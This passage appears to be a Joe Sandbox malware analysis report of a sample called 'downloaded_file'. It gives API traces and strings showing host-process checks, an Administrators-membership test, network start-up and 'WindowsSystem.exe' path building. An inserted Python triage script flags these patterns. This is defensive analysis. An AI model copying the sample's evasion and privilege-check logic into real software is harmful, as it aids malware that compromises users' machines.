• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$CloseFileFreeHandle$AllocCreateWrite_memmovelstrcpy
• String ID: .DLL$rT=
• API String ID: 1779380834-3072103379
• Opcode ID: 12369dfa268be29e3c2031a04437f1a397c939c0080951abf351c3dcde6f4dcb
• Instruction ID: 211d48cd77ae9956f9cae649d7792657456a432893814aed7be183cddc7b320c
• Opcode Fuzzy Hash: 12369dfa268be29e3c2031a04437f1a397c939c0080951abf351c3dcde6f4dcb
• Instruction Fuzzy Hash: A9514C75A01208DBCB26CF94DC88FDDB7B9EB4C300F108599F649A7291C6709AC0DF50
APIs
• _memset.LIBCMT ref: 00302314
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00302328
• _memset.LIBCMT ref: 0030234B
• LocalAlloc.KERNEL32(00000040,?), ref: 0030239E
• __snwprintf.LIBCMT ref: 003023D1
• CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 00302401
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00302415
• CloseHandle.KERNEL32(00000000), ref: 00302422
• CloseHandle.KERNEL32(?), ref: 0030242F
• LocalFree.KERNEL32(00000000), ref: 0030243C
• LocalFree.KERNEL32(00000000), ref: 00302449
  • Part of subcall function 003179F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
• LocalFree.KERNEL32(00000000), ref: 00302467
• LocalFree.KERNEL32(00000000), ref: 0030247D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
                                                                                                            • API ID: Local$Free$CloseHandle_memset$AllocCreateDirectoryObjectProcessSingleSystemWait__snwprintflstrlen
                                                                                                            • String ID: D
                                                                                                            • API String ID: 1415010105-2746444292
                                                                                                            • Opcode ID: c42b6d23f3db09648d3f6eca40499a0749264de2e29b9c1bba960c7cec6e1ae5
                                                                                                            • Instruction ID: 2b6bd17dd25f0e0c0a8fca215ff3b69645712b2a6aecb72e83a7b45b73d259f2
                                                                                                            • Opcode Fuzzy Hash: c42b6d23f3db09648d3f6eca40499a0749264de2e29b9c1bba960c7cec6e1ae5
                                                                                                            • Instruction Fuzzy Hash: 125159B0A122289FEB26DF54DD58BDABB7CAF49304F0045D8E60DAA280D7B45BC4CF51
APIs
• LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,0031BC7D), ref: 0030BB8D
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BBA7
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BBC1
• GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 0030BBDF
• GetWindowsDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030BBF2
• __snwprintf.LIBCMT ref: 0030BC0E
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0030BC1E
• LocalFree.KERNEL32(00000000), ref: 0030BC2C
• LocalFree.KERNEL32(00000000), ref: 0030BC36
• LocalFree.KERNEL32(00000000), ref: 0030BC40
• LocalFree.KERNEL32(00000000), ref: 0030BC51
• LocalFree.KERNEL32(00000000), ref: 0030BC5B
• LocalFree.KERNEL32(00000000), ref: 0030BC65
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows__snwprintflstrcmpi
• String ID: %s\explorer.exe
• API String ID: 150365659-2893622748
• Opcode ID: 4e139395239ee232324b0d17f62fa7f1557a7c5a38e88421ecf0792e114c9cc1
• Instruction ID: 19c399f30778e6f4c8251782f1ba54bbcf48eba5b1d0ebbdf9f0f1d76facbe2d
• Opcode Fuzzy Hash: 4e139395239ee232324b0d17f62fa7f1557a7c5a38e88421ecf0792e114c9cc1
• Instruction Fuzzy Hash: 62215174A00204FBE725EBA4DD59EADBB7DAF48701F104478FA0AE62D0CB749A80CB10
APIs
• LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,0031BCBF), ref: 0030BC8D
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BCA7
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BCC1
• GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 0030BCDF
• GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030BCF2
• __snwprintf.LIBCMT ref: 0030BD0E
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0030BD1E
• LocalFree.KERNEL32(00000000), ref: 0030BD2C
• LocalFree.KERNEL32(00000000), ref: 0030BD36
• LocalFree.KERNEL32(00000000), ref: 0030BD40
• LocalFree.KERNEL32(00000000), ref: 0030BD51
• LocalFree.KERNEL32(00000000), ref: 0030BD5B
• LocalFree.KERNEL32(00000000), ref: 0030BD65
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
• String ID: %s\svchost.exe
• API String ID: 4247545968-1955667316
• Opcode ID: 7c3487dea402e997d56ee763bbe3174e9227b58988d75116c82ddac198629d71
• Instruction ID: e178c9adfaa52fd5edb13830337e0bed4c61d9b02465bbe2affb64adcc7cec5e
• Opcode Fuzzy Hash: 7c3487dea402e997d56ee763bbe3174e9227b58988d75116c82ddac198629d71
• Instruction Fuzzy Hash: 97213174A10205FBD735AFA4DC59EADFB79AF48701F104578FA09EA2D0DB749A80CB10
APIs
• LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,0031BD01), ref: 0030BD8D
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BDA7
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BDC1
• GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 0030BDDF
• GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030BDF2
• __snwprintf.LIBCMT ref: 0030BE0E
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0030BE1E
• LocalFree.KERNEL32(00000000), ref: 0030BE2C
• LocalFree.KERNEL32(00000000), ref: 0030BE36
• LocalFree.KERNEL32(00000000), ref: 0030BE40
• LocalFree.KERNEL32(00000000), ref: 0030BE51
• LocalFree.KERNEL32(00000000), ref: 0030BE5B
• LocalFree.KERNEL32(00000000), ref: 0030BE65
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
• String ID: %s\cmd.exe
• API String ID: 4247545968-923833829
• Opcode ID: b8be6886c4009e7c6ad66404fbcece0157b17d7158f623e6d4745776ce1df5e0
• Instruction ID: d0ca6d66a1f758fc097e8b00da462af36db7dc37c2f43f23ec1fb9dac34aafb3
• Opcode Fuzzy Hash: b8be6886c4009e7c6ad66404fbcece0157b17d7158f623e6d4745776ce1df5e0
• Instruction Fuzzy Hash: C6213175E00309FBDB169BA4ED99FAEB7BAAF08701F104564F705A62D0DB749A04CB10
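The three records above share one shape: the function takes its own image path with GetModuleFileNameW, formats "%s\explorer.exe", "%s\svchost.exe" or "%s\cmd.exe" over the Windows or System directory, and compares the two case-insensitively with lstrcmpiW, i.e. it decides which host process it is currently running in. The following triage script is an added example by the editor, not part of this report and not Joe Sandbox code. It parses the "APIs" and "Similarity" blocks in the line shape shown above and flags that host-process check for any "%s\<name>.exe" string (a generalisation of the three cases here), plus the BUILTIN\Administrators membership check visible later in this report (AllocateAndInitializeSid with sub-authority count 2 and RIDs 0x20/0x220, which are the Windows SDK constants SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS, i.e. S-1-5-32-544, followed by CheckTokenMembership). The sample text is constructed from lines of this report; the record format assumptions are the regexes in the code.

```python
"""Triage the per-function API traces of a Joe Sandbox report.

Added example (editor's code, not Joe Sandbox's).  Flags two patterns:
  * host-process identity check: GetModuleFileNameW + lstrcmpiW against a
    '%s\\<name>.exe' string built from GetWindowsDirectoryW/GetSystemDirectoryW
  * admin membership check: AllocateAndInitializeSid(..., 2, 0x20, 0x220, ...)
    (= S-1-5-32-544) followed by CheckTokenMembership
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One trace line: optional subcall prefix, Api.MODULE(args), ref: address.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*?)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")
HOST_STR_RE = re.compile(r"^%s\\[\w.-]+\.exe$", re.IGNORECASE)
ADMIN_RIDS = {"00000020", "00000220"}  # SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None = None


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    opcode_id: str = ""

    def has(self, *names: str) -> bool:
        present = {c.name for c in self.calls}
        return all(n in present for n in names)


@dataclass
class Finding:
    kind: str
    detail: str
    opcode_id: str


def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into one FunctionRecord per 'APIs' block."""
    records: list[FunctionRecord] = []
    rec = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()  # tolerate indentation and bullets
        if line == "APIs":
            rec = FunctionRecord()
            records.append(rec)
            continue
        if rec is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            rec.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"].upper(), m["sub"]))
        elif line.startswith("String ID: "):
            rec.strings = line[len("String ID: "):].split("$")  # '$' separates strings
        elif line.startswith("Opcode ID: "):
            rec.opcode_id = line[len("Opcode ID: "):]
    return records


def triage(records: list[FunctionRecord]) -> list[Finding]:
    """Apply the two behavioural rules to every parsed function record."""
    findings: list[Finding] = []
    for rec in records:
        if rec.has("GetModuleFileNameW", "lstrcmpiW"):
            base = next((d for d in ("GetWindowsDirectoryW", "GetSystemDirectoryW")
                         if rec.has(d)), "an unknown directory")
            for s in rec.strings:
                if HOST_STR_RE.match(s):
                    findings.append(Finding(
                        "host-process-check",
                        f"own module path compared case-insensitively with {s} built from {base}",
                        rec.opcode_id))
        if rec.has("AllocateAndInitializeSid", "CheckTokenMembership"):
            for c in rec.calls:
                if c.name == "AllocateAndInitializeSid" and ADMIN_RIDS <= set(c.args):
                    where = f" in subcall {c.subcall_of}" if c.subcall_of else ""
                    findings.append(Finding(
                        "admin-token-check",
                        f"BUILTIN\\Administrators SID (S-1-5-32-544) built{where}, "
                        "then tested with CheckTokenMembership", rec.opcode_id))
    return findings


# Constructed sample: lines copied from this report's records, abbreviated.
SAMPLE = """\
APIs
• GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 0030BBDF
• GetWindowsDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030BBF2
• __snwprintf.LIBCMT ref: 0030BC0E
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0030BC1E
• LocalFree.KERNEL32(00000000), ref: 0030BC2C
Similarity
• String ID: %s\\explorer.exe
• Opcode ID: 4e139395239ee232324b0d17f62fa7f1557a7c5a38e88421ecf0792e114c9cc1
APIs
• GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 0030BDDF
• GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030BDF2
• __snwprintf.LIBCMT ref: 0030BE0E
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0030BE1E
Similarity
• String ID: %s\\cmd.exe
• Opcode ID: b8be6886c4009e7c6ad66404fbcece0157b17d7158f623e6d4745776ce1df5e0
APIs
• CreateThread.KERNEL32(00000000,00000000,00321030,00000000,00000000,00000000), ref: 00316BAF
  • Part of subcall function 0031C3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0031C3DB
  • Part of subcall function 0031C3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0031C3F4
"""

if __name__ == "__main__":
    for f in triage(parse_records(SAMPLE)):
        print(f"[{f.kind}] {f.detail} (opcode {f.opcode_id[:16] or 'n/a'})")
```

Run it on the text of a whole report (for example the saved HTML converted to text) to get one line per flagged function; the Opcode ID lets you jump back to the matching record. The host-process rule keys on the string rather than on the three names seen here, so a variant that checks for a different host binary is still flagged.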
APIs
• LocalAlloc.KERNEL32(00000040,00000FA0), ref: 00310607
• LocalFree.KERNEL32(00000000), ref: 00310C5A
• LocalFree.KERNEL32(00000000), ref: 00310C70
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00310C8D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: FreeLocal$AllocVirtual
• String ID: @$_DllMain@12
• API String ID: 631462101-1064695914
• Opcode ID: 16215be5b028f2ed0e2e31a8716c17c423ce6fb1e78c8cd8927c6f6ba0a2eb83
• Instruction ID: df635448c5bb6124f43bdad6110c7d8d3edde2248bfcf27b77160b6d46e51bee
• Opcode Fuzzy Hash: 16215be5b028f2ed0e2e31a8716c17c423ce6fb1e78c8cd8927c6f6ba0a2eb83
• Instruction Fuzzy Hash: 18228C74A05228CBDB2ACF18C994BEAB7B1BF89305F1081D9D509AB351D775AEC5CF80
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
• _memmove.LIBCMT ref: 00317A48
• lstrlenW.KERNEL32(?), ref: 00317A6C
• LocalAlloc.KERNEL32(00000040,?), ref: 00317A7F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: lstrlen$AllocLocal_memmove
• String ID: G3$G3$G3$h1G3
• API String ID: 39496755-3426192093
• Opcode ID: a80d8d1b07f5633d444a1c9cf1061a5df5261bff402afe30083674596de7f884
• Instruction ID: e07f746c30aa00ac67cf458c912a7fe66d72459a3449f088171e9b2bde1a7d71
• Opcode Fuzzy Hash: a80d8d1b07f5633d444a1c9cf1061a5df5261bff402afe30083674596de7f884
• Instruction Fuzzy Hash: DF71F974A0810AEFCB09CF98D495EEEB7B5FF4C304F248558E905AB350D734AA95CBA0
APIs
• _memset.LIBCMT ref: 00316A7A
• __snwprintf.LIBCMT ref: 00316A9F
  • Part of subcall function 0030A680: _memset.LIBCMT ref: 0030A6BF
  • Part of subcall function 0030A680: _memset.LIBCMT ref: 0030A70A
  • Part of subcall function 0030A680: CoInitializeEx.COMBASE(00000000,00000000), ref: 0030A754
• LocalFree.KERNEL32(00000000), ref: 00316AD9
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316B24
• CreateThread.KERNEL32(00000000,00000000,0030F100,00000000,00000000,00000000), ref: 00316B47
• CloseHandle.KERNEL32(00000000), ref: 00316B64
• WSAStartup.WS2_32(00000002,?), ref: 00316B73
• CreateThread.KERNEL32(00000000,00000000,0031B630,00000000,00000000,00000000), ref: 00316B95
• CreateThread.KERNEL32(00000000,00000000,00321030,00000000,00000000,00000000), ref: 00316BAF
  • Part of subcall function 0031C3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0031C3DB
  • Part of subcall function 0031C3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0031C3F4
  • Part of subcall function 0031C3A0: FreeSid.ADVAPI32(?), ref: 0031C409
• WSACleanup.WS2_32 ref: 00316BCA
  • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
  • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
  • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
  • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Similarity
• API ID: Create$FreeThread_memsetlstrlen$InitializeLocal__snwprintf$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken
• String ID: "%s%s"$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
• API String ID: 3184904793-474631092
• Opcode ID: 071b508c7de7a8573f1bfed512d5030396798880104930553583074c80420588
• Instruction ID: cc23589e620e35e9998131ad8129d9c9ea65ded7cb9cc8d0d7bd8563d5393fe8
• Opcode Fuzzy Hash: 071b508c7de7a8573f1bfed512d5030396798880104930553583074c80420588
• Instruction Fuzzy Hash: 79418070A90314ABEB3B9B94EC5BFE6336CAB19B05F108058F20DB91D1D6F469C4CB16
APIs
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313364
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313385
• SHGetKnownFolderPath.SHELL32(00337C30,00000000,00000000,00000000), ref: 003133AC
• lstrlenW.KERNEL32(00000000), ref: 003133BA
• __snwprintf.LIBCMT ref: 003133E4
• __snwprintf.LIBCMT ref: 003133FE
• LocalFree.KERNEL32(00000000), ref: 0031340A
• CoTaskMemFree.COMBASE(00000000), ref: 00313414
• CoTaskMemFree.COMBASE(00000000), ref: 00313423
• LocalFree.KERNEL32(00000000), ref: 0031342D
• LocalFree.KERNEL32(00000000), ref: 00313437
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: FreeLocal$AllocTask__snwprintf$FolderKnownPathlstrlen
• String ID: %s\System32$\\?\%s
• API String ID: 2558432158-2868705786
• Opcode ID: df55fa0bc6b4aed136ef82c66e247accce0bb5ff96baa228906345f80141f7c2
• Instruction ID: 1bd0022383570b6d224a5be28f98b0be888db0ca50e63511448d12d139b21789
• Opcode Fuzzy Hash: df55fa0bc6b4aed136ef82c66e247accce0bb5ff96baa228906345f80141f7c2
• Instruction Fuzzy Hash: 352121B5E00218FFDB25DBE4DC89BADBB79EF48700F504558F605AB290DB745A80CB50
APIs
• LocalAlloc.KERNEL32(00000040,-00000001,?,0031B8E1,00000000,00000000,0037D2C8,0037D370), ref: 0031B9AF
• _memmove.LIBCMT ref: 0031B9CE
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0031B8E1,00000000,00000000), ref: 0031B9F4
• inet_addr.WS2_32(00000000), ref: 0031BA14
• gethostbyname.WS2_32(00000000), ref: 0031BA27
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0031B8E1,00000000), ref: 0031BA3A
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: Local$Free$Alloc_memmovegethostbynameinet_addr
• String ID:
• API String ID: 3088692038-0
• Opcode ID: 457c82753af63889b0ffd6a0621c8c8bdee6711080392bcce5e172e7ba3c8be2
• Instruction ID: 0f6479d4b3791d84f990fed094423562baf58eb157cad076a91048c2d696774f
• Opcode Fuzzy Hash: 457c82753af63889b0ffd6a0621c8c8bdee6711080392bcce5e172e7ba3c8be2
• Instruction Fuzzy Hash: 0F41ECB9E00208EFCB09DFA4D985BAEB7B9FF4C304F104558F506A7250D775AA40DB50
APIs
• SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00315BB2,?,?,?,?,?,?,?,?,?,?,?,00315BB2), ref: 00312E13
• LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,00315BB2), ref: 00312E28
• __snwprintf.LIBCMT ref: 00312E61
• lstrlenW.KERNEL32(00000000), ref: 00312E6D
• _memset.LIBCMT ref: 00312E97
• GetFileAttributesW.KERNEL32(00000000), ref: 00312EC0
• SHFileOperationW.SHELL32(?), ref: 00312ED7
• LocalFree.KERNEL32(00000000), ref: 00312EFD
• CoTaskMemFree.COMBASE(00315BB2), ref: 00312F07
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: FileFreeLocal$AllocAttributesFolderKnownOperationPathTask__snwprintf_memsetlstrlen
• String ID: %s\%s${DCC27317-D180-4C2F-8EAC-B87FB882F1DC}
• API String ID: 561441633-2871714980
• Opcode ID: 278df3dd68a016bf3c9dde9206a79711b5b25699f4b974bd9030c83a68015a1e
• Instruction ID: 615e395f377743649437caa6f8af7b050eb9b5a144becfd61e794d603c52ee8c
• Opcode Fuzzy Hash: 278df3dd68a016bf3c9dde9206a79711b5b25699f4b974bd9030c83a68015a1e
• Instruction Fuzzy Hash: 51318074E00208EBDB29DFA4DC49BEEBB79FF48700F108569F505A7290E7749A90CB64
APIs
• SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316BFC
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316C14
• CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C2A
• SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316C3F
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316C57
• CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C6D
• CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C82
• SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316C98
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316CB0
• CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316CC5
• SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316CDB
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316CF3
• CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316D08
• CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316D1E
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: CloseHandle$EventObjectSingleWait
• String ID:
• API String ID: 2857295742-0
• Opcode ID: b9dc2c592dc7012556393e681efd6f6de4ae7aa498f0cbe12d0662d3fe42c945
• Instruction ID: 3c44a056f553aa3c4dd0562e28ff5e287ee7d6aa40ba12b17087478bed8762d2
• Opcode Fuzzy Hash: b9dc2c592dc7012556393e681efd6f6de4ae7aa498f0cbe12d0662d3fe42c945
